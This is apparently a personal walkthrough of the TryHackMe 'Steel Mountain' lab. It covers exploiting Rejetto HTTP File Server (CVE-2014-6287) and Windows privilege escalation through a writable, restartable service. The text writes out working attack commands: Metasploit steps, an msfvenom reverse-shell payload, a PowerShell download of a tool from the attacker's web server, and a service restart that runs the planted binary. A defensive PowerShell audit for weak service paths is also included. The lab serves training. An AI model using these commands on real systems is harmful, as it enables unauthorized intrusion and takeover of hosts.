TryHackMe: Steel Mountain

A walkthrough.

Start with nmap.

nmap -A -vv target_ip

You will find web servers on port 80 and 8080.

Access the web server on port 80

I did reverse image search and got the answer.

Another way to do this is to inspect the page and check the image element.

Task 1: Introduction

Who is the employee of the month?

Bill Harper

Task 2: Initial Access

Scan the machine with nmap. What is the other port running a web server on?

8080

Take a look at the other web server. What file server is running?

Rejetto HTTP File Server

(screenshot: the web server on port 8080)

What is the CVE number to exploit this file server?

2014-6287

Use Metasploit to get an initial shell. What is the user flag?

In msfconsole:

search rejetto
set RHOSTS target_ip
set RPORT 8080
run

(screenshot: initial shell)
(screenshot: task 2 flag)

The flag is in user.txt.

Task 3: Privilege Escalation

So I got the initial shell and I need to further enumerate the machine and escalate the privileges to root.

To enumerate this machine, we will use a PowerShell script called PowerUp, whose purpose is to evaluate a Windows machine and find misconfigurations: “PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.”

You can download the script here.

So let’s download the script to our attackbox:

  • wget the PowerUp.ps1 file from GitHub
  • upload the file using the Metasploit upload command

To execute this PowerShell script from meterpreter, first load the powershell extension with the following command:

load powershell 

Enter PowerShell using the following command:

powershell_shell

(screenshot: enter the powershell)
(screenshot: run the script)

Pay close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?

AdvancedSystemCareService9

With CanRestart set to true, we are allowed to restart the service ourselves, and the directory containing the application is also writable. This means we can replace the legitimate application with our malicious one and restart the service, which will then run our infected program!

Now generate a reverse shell as a Windows executable using msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=attackbox_ip LPORT=4443 -e x86/shikata_ga_nai -f exe -o Advanced.exe

(screenshot: generating reverse shell using msfvenom)

Upload your binary and replace the legitimate one. Then restart the program to get a shell as root.

Note: The service showed up as having an unquoted path (and could be exploited using this technique); however, in this case we have exploited weak file permissions on the service files instead.

Before we upload our binary let’s stop the vulnerable service that we have identified in the previous steps:

(screenshot: stopping vulnerable service)

So, the location was identified previously from the output of PowerUp.ps1, and we will be replacing ASCService.exe with the previously generated payload.

So now, to upload the Advanced.exe binary we generated using msfvenom, let’s go back to our PowerShell channel and put it in the background:

(screenshot: background the powershell channel)

This drops us back into the meterpreter shell, from where we can use the upload command. It makes sense to rename Advanced.exe to ASCService.exe.

(screenshot: channel command options)

After uploading the file I resume the PowerShell session using the following command:

channel -i 3

3 being the ID of the channel that we previously put to background.

I moved the malicious ASCService.exe to Bill’s desktop, but it’s not a necessary step.

A good thing about this task is that I’ve learned some powershell commands :D

(screenshot: replacing the binary)

You can see that the file was replaced and it’s time to start the service.

But before starting the service, make sure you have a netcat listener running on port 4443 (the port we specified when generating the reverse shell payload with msfvenom).

(screenshot: starting the service)

It errored out but I still got the shell. Not sure if that’s supposed to happen.

(screenshot: established a reverse shell connection)

And here is the flag:

(screenshot: task 3 flag)

Task 4: Access and Escalation Without Metasploit

For this we will utilise PowerShell and winPEAS to enumerate the system and collect the information needed to escalate.

To begin we shall be using the same CVE. However, this time let’s use this exploit.

*Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!*

To begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from GitHub!

You will need to run the exploit twice. The first time will pull our netcat binary to the system and the second will execute our payload to gain a callback!

So, we gotta do 3 things:

  • download netcat static binary
  • download the Rejetto HTTP File Server (HFS) 2.3.x RCE exploit
  • download winPEAS

⚠️ I ran into some issues when trying to use the Rejetto HTTP File Server (HFS) 2.3.x exploit downloaded from exploit-db, because I was doing this task using THM’s AttackBox, which has port 80 busy by default, and the version of python installed there did not support some of the semantics used in the original exploit. So I fixed this script; you can download the gist. I made it expect the python server to be running on port 8080 instead, so that it can be used within THM’s AttackBox.

Spin up python’s http.server from the same directory where you saved the downloaded winPEAS and nc binaries.

python3 -m http.server 8080

Before running the exploit you will need to edit lines 35 and 36 to contain the IP address of your Attackbox and any port (I used 1443).

(screenshot: rejetto-exploit.py)

You will also need to run a netcat listener on port 1443 if you don’t edit line 36 of the exploit.

Run the rejetto exploit. Script usage is:

python exploit.py <Target IP address> <Target Port Number>

In our case it is port 8080 of the targeted Rejetto server.

So, after you run the exploit twice you will see that you got the 🐚.

(screenshot: 🐚)

Congratulations, we’re now onto the system. Now we can pull winPEAS to the system using powershell -c.

powershell -c wget "http://attackbox_ip_address:8080/winPEASany.exe" -outfile "winpeas.exe"

Once we run winPEAS, we see that it points us towards unquoted paths. We can also see that it provides us with the name of the service that is running.

To run it just type:

winpeas.exe

source: https://tryhackme.com/room/steelmountain

What powershell -c command could we run to manually find out the service name?

powershell -c "Get-Service"
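As a defender-side counterpart to the CanRestart / unquoted-path / writable-directory finding in Task 3 and to the winPEAS and Get-Service enumeration above, here is an added PowerShell audit that is not part of the room, PowerUp or winPEAS. It assumes an elevated shell on the host being reviewed and treats Everyone, BUILTIN\Users and Authenticated Users as the low-privileged principals of interest.

```powershell
# Added defender-side audit (not from the TryHackMe room, PowerUp or winPEAS):
# list services whose binary path is unquoted and contains spaces, and/or
# whose executable or its directory can be modified by low-privileged principals.
# Run in an elevated PowerShell on the host being reviewed.

$lowPrivIdentities = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')
# Rights that let a low-privileged user drop, replace or remove a file.
$writeMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles'

function Test-LowPrivWritable {
    param([string]$Path)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return $false }
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPrivIdentities -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band [int]$writeMask) -ne 0) { return $true }
    }
    return $false
}

function Get-ServicePathFindings {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $raw = $_.PathName
        if (-not $raw) { return }
        # Recover the executable path: the quoted part if present, else up to the first .exe
        if ($raw -match '^"([^"]+)"')      { $exe = $Matches[1] }
        elseif ($raw -match '^(.+?\.exe)') { $exe = $Matches[1] }
        else                               { $exe = ($raw -split ' ')[0] }
        # Unquoted path with a space: the loader may try each prefix that ends at a space.
        $unquoted    = ($raw -notmatch '^"') -and ($exe -match ' ')
        $dirWritable = Test-LowPrivWritable -Path (Split-Path -Parent $exe)
        $exeWritable = Test-LowPrivWritable -Path $exe
        if ($unquoted -or $dirWritable -or $exeWritable) {
            [pscustomobject]@{
                Service     = $_.Name
                RunsAs      = $_.StartName
                Unquoted    = $unquoted
                DirWritable = $dirWritable
                ExeWritable = $exeWritable
                Path        = $raw
            }
        }
    }
}

Get-ServicePathFindings | Format-Table -AutoSize
```

Any hit is remediated by quoting the path (sc config <service> binPath= "\"C:\path with spaces\svc.exe\"", note the space after binPath=) and removing write and delete access for non-administrator principals from the service's executable and its directory.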

Now let’s escalate to Administrator with our new found knowledge.

Generate your payload using msfvenom and pull it to the system using powershell.

Now we can move our payload to the unquoted directory winPEAS alerted us to and restart the service with two commands.

First we need to stop the service, which we can do like so:

sc stop AdvancedSystemCareService9

Shortly followed by:

sc start AdvancedSystemCareService9

Once this command runs, you will see you gain a shell as Administrator on our listener!

Everything is unknown until it’s known. Self-learner.